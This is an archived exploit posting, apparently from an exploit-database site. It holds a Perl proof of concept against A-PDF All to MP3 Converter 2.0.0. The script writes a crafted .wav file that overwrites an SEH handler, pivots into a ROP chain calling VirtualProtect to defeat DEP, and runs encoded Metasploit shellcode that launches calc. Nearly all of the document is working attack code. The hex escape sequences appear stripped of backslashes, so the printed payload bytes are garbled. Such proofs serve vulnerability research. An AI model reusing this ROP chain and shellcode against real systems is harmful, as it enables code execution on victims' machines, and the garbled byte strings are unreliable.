Home / exploitsPDF  

A-PDF All To MP3 Converter 2.0.0 DEP Bypass

Posted on 13 May 2011

# Exploit Title: A-PDF All to MP3 Converter v.2.0.0 DEP Bypass
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: 2.0.0
# Tested on: Win XP SP3 French
# Date: 12/05/2011
# Author: h1ch4m
# Email: h1ch4m@live.fr
# Home: http://net-effects.blogspot.com
# Big thanks to corelanc0d3r for the Help & the Precious advices

my $file= "1.wav";
my $size = 8000;
my $junk = "x41" x 4136;

#######################      STACK PIVOT      ###########################
my $SEH = pack('V', 0x00408E66);        # ADD ESP,400 # RETN - Alltomp3.exe -  ** Null byte **
my $JUNK_TO_ROP = "D" x 40;

#######################     STACK POINTER     ###########################
my $ROP = pack('V', 0x0042C86F);        # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **
$ROP .= "A" x 8;
$ROP .= pack('V', 0x1003176D);          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  **
$ROP .= "A" x 4;
$ROP .= pack('V', 0x1001FF5D);          # ADD ESP,18 # RETN - lame_enc.dll -  **

############ Parameters for VirtualProtect() ############
$ROP .= pack('V', 0x7c801ad4);          # VirtualProtect()  0x7c801ad4 Kernel32.dll
$ROP .= "AAAA";                         # Parameter 1
$ROP .= "BBBB";                         # Parameter 2
$ROP .= "CCCC";                         # Parameter 3
$ROP .= "DDDD";                         # Parameter 4
$ROP .= pack("V", 0x6D00E010);          # Writeable address

######################   PARAMETER 1  ###########################
$ROP .= pack('V', 0x004081CB);          # ADD EAX,10 # RETN [Module : Alltomp3.exe]  ** Null byte **
$ROP .= pack('V', 0x1002B910);          # ADD EAX,8 # RETN [Module : lame_enc.dll]  **
$ROP .= pack('V', 0x004BB477);          # MOV ECX,EAX # MOV EAX,ECX # RETN [Module : Alltomp3.exe]  ** Null byte **
$ROP .= pack('V', 0x1003176D);          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  **
$ROP .= "A" x 4;
$ROP .= pack('V', 0x1003C6A4);          # ADD EAX,100 # POP EBP # RETN [Module : lame_enc.dll]  **
$ROP .= "A" x 4;
$ROP .= pack('V', 0x1003C67A);          # ADD EAX,80 # POP EBP # RETN [Module : lame_enc.dll]  **
$ROP .= "A" x 4;
$ROP .= pack('V', 0x1003C696);          # ADD EAX,40 # POP EBP # RETN [Module : lame_enc.dll]  **
$ROP .= "A" x 4;
$ROP .= pack('V', 0x1002B23D);          # ADD EAX,20 # RETN [Module : lame_enc.dll]  **
$ROP .= pack('V', 0x004081CB);          # ADD EAX,10 # RETN [Module : Alltomp3.exe]  ** Null byte **
$ROP .= pack('V', 0x1003303A);          # MOV DWORD PTR DS:[ECX],EAX # RETN     [Module : lame_enc.dll]  **
######################   PARAMETER 2  ###########################
$ROP .= pack('V', 0x10002388);          # MOV DWORD PTR DS:[ECX+4],EAX # XOR EAX,EAX # RETN [Module : lame_enc.dll]  ** Null byte **

######################   PARAMETER 3  ###########################
$ROP .= pack('V', 0x1003C6A4);          # ADD EAX,100 # POP EBP # RETN [Module : lame_enc.dll]  **
$ROP .= "A" x 4;
$ROP .= pack('V', 0x1003C6A4);          # ADD EAX,100 # POP EBP # RETN [Module : lame_enc.dll]  **
$ROP .= "A" x 4;
$ROP .= pack('V', 0x1003C6A4);          # ADD EAX,100 # POP EBP # RETN [Module : lame_enc.dll]  **
$ROP .= "A" x 4;
$ROP .= pack('V', 0x100023D1);          # MOV DWORD PTR DS:[ECX+8],EAX # XOR EAX,EAX # RETN [Module : lame_enc.dll]  ** Null byte **

######################   PARAMETER 4  ###########################
$ROP .= pack('V', 0x1003C696);          # ADD EAX,40 # POP EBP # RETN [Module : lame_enc.dll]  **
$ROP .= "A" x 4;
$ROP .= pack('V', 0x100023A8);          # MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # RETN [Module : lame_enc.dll]  ** Null byte **

################### Jump To VirtualProtect() #####################
$ROP .= pack('V', 0x1003176D);          # MOV EAX,EDI # POP ESI # RETN  [Module : lame_enc.dll]  **
$ROP .= "A" x 4;
$ROP .= pack('V', 0x004081CB);          # ADD EAX,10 # RETN [Module : Alltomp3.exe]  ** Null byte **
$ROP .= pack('V', 0x0040C10B);          # ADD EAX,4 # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **
$ROP .= "A" x 4;
$ROP .= pack('V', 0x6D00C3D1);          # XCHG EAX,ESP # RETN [Module : CDRip122.dll]  ** Null byte **

#######################    NOPS     ###########################
my $NOPS = "x90" x (500-length($ROP));

#######################  SHELLCODE  ###########################
# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "xdaxddxbfxb0x1ax64x4fxd9x74x24xf4x58x31xc9" .
"xb1x32x31x78x17x83xc0x04x03xc8x09x86xbaxd4" .
"xc6xcfx45x24x17xb0xccxc1x26xe2xabx82x1bx32" .
"xbfxc6x97xb9xedxf2x2cxcfx39xf5x85x7ax1cx38" .
"x15x4bxa0x96xd5xcdx5cxe4x09x2ex5cx27x5cx2f" .
"x99x55xafx7dx72x12x02x92xf7x66x9fx93xd7xed" .
"x9fxebx52x31x6bx46x5cx61xc4xddx16x99x6exb9" .
"x86x98xa3xd9xfbxd3xc8x2ax8fxe2x18x63x70xd5" .
"x64x28x4fxdax68x30x97xdcx92x47xe3x1fx2ex50" .
"x30x62xf4xd5xa5xc4x7fx4dx0exf5xacx08xc5xf9" .
"x19x5ex81x1dx9fxb3xb9x19x14x32x6exa8x6ex11" .
"xaaxf1x35x38xebx5fx9bx45xebx07x44xe0x67xa5" .
"x91x92x25xa3x64x16x50x8ax67x28x5bxbcx0fx19" .
"xd0x53x57xa6x33x10xa9x57x8ex8cx3excex7bxed" .
"x22xf1x51x31x5bx72x50xc9x98x6ax11xccxe5x2c" .
"xc9xbcx76xd9xedx13x76xc8x8dxf2xe4x90x51";

my $REST = "x42" x ($size-length($junk.$SEH.$JUNK_TO_ROP.$ROP.$NOPS.$shellcode));

open($FILE,">$file");
print $FILE $junk.$SEH.$JUNK_TO_ROP.$ROP.$NOPS.$shellcode.$REST;
close($FILE);
print "File Created successfully
";
sleep(1);

 

TOP

Malware :

Exploits :